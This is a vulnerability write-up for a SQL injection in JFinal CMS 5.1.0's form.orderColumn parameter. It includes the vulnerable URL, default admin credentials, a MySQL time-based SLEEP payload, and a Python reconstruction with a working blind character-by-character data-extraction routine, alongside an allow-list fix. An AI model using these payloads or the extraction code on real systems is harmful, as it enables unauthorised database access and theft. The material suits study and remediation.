Description
A SQL injection vulnerability exists in JFinal CMS 5.1.0: the form.orderColumn request parameter handled by com.jflyfox.system.log.LogController is concatenated into an SQL statement without validation.
Analysis
The vulnerable code is in lines 23-47 of com.jflyfox.system.log.LogController.java:

Here the controller calls SQLUtils to build the query, starting from the following statement:
select count(*) from sys_log t where 1=1
When model.getAttrValues() has a non-zero length, execution enters the if branch and calls the whereEquals() method, which concatenates the filter conditions onto the statement.
whereEquals():

The SQL statement after concatenation is as follows:
select count(*) from sys_log t where 1=1 AND t.log_type = 1
Next, the orderBy parameter is concatenated onto the end of the SQL statement.
The line String orderBy = getBaseForm().getOrderBy(); shows where the orderBy value comes from:
getBaseForm():

getOrderBy():

The orderBy value is the form.orderColumn parameter submitted from the front end. It reaches the SQL string as-is, so a payload can be constructed to exploit this vulnerability. Note that an ORDER BY target cannot be bound as a prepared-statement parameter; the correct fix is to map form.orderColumn onto a fixed list of permitted column names and sort directions before it touches the query.
Exploit
Environment: build and start the project with Maven.
Vulnerable URL: /jfinal_cms/system/log/list
Administrator login is required. The default credentials are admin:admin123

Injection parameter: form.orderColumn
payload:) AND (SELECT 6361 FROM (SELECT(SLEEP(5)))tAVU)-- woqr
This is a MySQL time-based blind test: if the response arrives roughly 5 seconds later than the same request with SLEEP(0), the injected expression is being executed by the database.
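The concatenation described in the analysis above and the time-based probe behind the payload, as an added Python example that is not code from JFinal CMS or from this write-up. It reconstructs the query shape from the statements shown on the page (the whereEquals() output and orderBy appended last), runs it against a constructed in-memory SQLite copy of sys_log with a recording stand-in for MySQL SLEEP(), and pairs the vulnerable builder with an allow-list version. The sample table's columns, the allow-list, the helper names and the assumption that the paged list query reuses the same ORDER BY as the count statement are mine, not the project's.

```python
import sqlite3
from typing import List, Tuple

# Query shape described on the page: a select over sys_log, whereEquals() filters
# appended as "AND t.col = value", and orderBy (form.orderColumn) concatenated last.
BASE_FROM = "from sys_log t where 1=1"

# Constructed sample rows standing in for sys_log; the real table layout is not on the page.
SAMPLE_ROWS = [(1, 1, "10.0.0.1"), (2, 1, "10.0.0.2"), (3, 2, "10.0.0.3")]

# The sqlmap-style time-based payload quoted in the write-up (MySQL SLEEP()).
PAGE_PAYLOAD = ") AND (SELECT 6361 FROM (SELECT(SLEEP(5)))tAVU)-- woqr"

# Hypothetical allow-list for the hardened builder; not taken from JFinal CMS.
ALLOWED_ORDER_COLUMNS = {"id", "log_type", "ip"}


def where_equals(sql: str, filters: dict) -> str:
    """Assumed shape of whereEquals(): one ' AND t.<col> = <value>' per attribute."""
    for col, val in filters.items():
        sql += f" AND t.{col} = {int(val)}"
    return sql


def build_vulnerable(select_list: str, filters: dict, order_by: str) -> str:
    """The concatenation the write-up describes: orderBy is appended verbatim."""
    sql = where_equals(f"select {select_list} {BASE_FROM}", filters)
    if order_by:
        sql += " order by " + order_by
    return sql


def injected_sql() -> str:
    """Where the page's payload lands. Its leading ')' closes a parenthesis in the real
    statement, so JFinal's exact surrounding text differs from this reconstruction."""
    return build_vulnerable("count(*)", {"log_type": 1}, PAGE_PAYLOAD)


def build_hardened(select_list: str, filters: dict, order_by: str, direction: str = "asc") -> str:
    """An ORDER BY target cannot be bound as a prepared-statement parameter, so the
    request value is mapped onto a fixed allow-list instead of being concatenated."""
    if order_by not in ALLOWED_ORDER_COLUMNS:
        raise ValueError(f"rejected order column: {order_by!r}")
    if direction.lower() not in ("asc", "desc"):
        raise ValueError(f"rejected sort direction: {direction!r}")
    sql = where_equals(f"select {select_list} {BASE_FROM}", filters)
    return f"{sql} order by t.{order_by} {direction.lower()}"


def hardened_rejects(order_by: str) -> bool:
    """True if the allow-list refuses the given form.orderColumn value."""
    try:
        build_hardened("count(*)", {"log_type": 1}, order_by)
    except ValueError:
        return True
    return False


def run(sql: str) -> Tuple[str, List[float]]:
    """Run sql against an in-memory copy of sys_log. Returns the first column of the
    first row (or the error text) plus the delays requested through sleep(), a stand-in
    for MySQL SLEEP() that records the call instead of blocking. Together these are what
    the attacker observes as response body and response time."""
    delays: List[float] = []

    def fake_sleep(seconds):
        delays.append(seconds)
        return 0  # MySQL SLEEP() returns 0

    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, fake_sleep)
    try:
        conn.execute("create table sys_log(id integer, log_type integer, ip text)")
        conn.executemany("insert into sys_log values (?, ?, ?)", SAMPLE_ROWS)
        row = conn.execute(sql).fetchone()
        return ("" if row is None else str(row[0]), delays)
    except sqlite3.Error as exc:
        return (f"error: {exc}", delays)
    finally:
        conn.close()


def blind_probe(condition: str) -> bool:
    """Time-based blind oracle through the ORDER BY position, the technique behind the
    page's payload: the sort key only calls sleep() when the condition is false. The
    row-returning form of the query is used so the sort key is evaluated per row."""
    payload = f"(case when {condition} then t.id else sleep(5) end)"
    _, delays = run(build_vulnerable("id, log_type, ip", {"log_type": 1}, payload))
    return not delays


def leak_string(subquery: str, max_len: int = 32) -> str:
    """Recover an arbitrary scalar subquery result one character at a time by
    binary-searching each code point through blind_probe()."""
    out = ""
    for pos in range(1, max_len + 1):
        if not blind_probe(f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if blind_probe(f"unicode(substr(({subquery}), {pos}, 1)) <= {mid}"):
                hi = mid
            else:
                lo = mid + 1
        out += chr(lo)
    return out


if __name__ == "__main__":
    print(injected_sql())
    print(run(build_vulnerable("count(*)", {"log_type": 1}, "t.id"))[0])
    print(leak_string("select ip from sys_log where id = 3"))
    print(hardened_rejects(PAGE_PAYLOAD), hardened_rejects("id"))
```

Because sleep() is recorded rather than executed, the probe shows the mechanism without the multi-second wait a real time-based extraction pays per request; against the live target each character of leak_string() would cost several delayed responses. An allow-list mapping of form.orderColumn, as in build_hardened(), is what to look for when checking whether a later JFinal CMS build fixed this.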

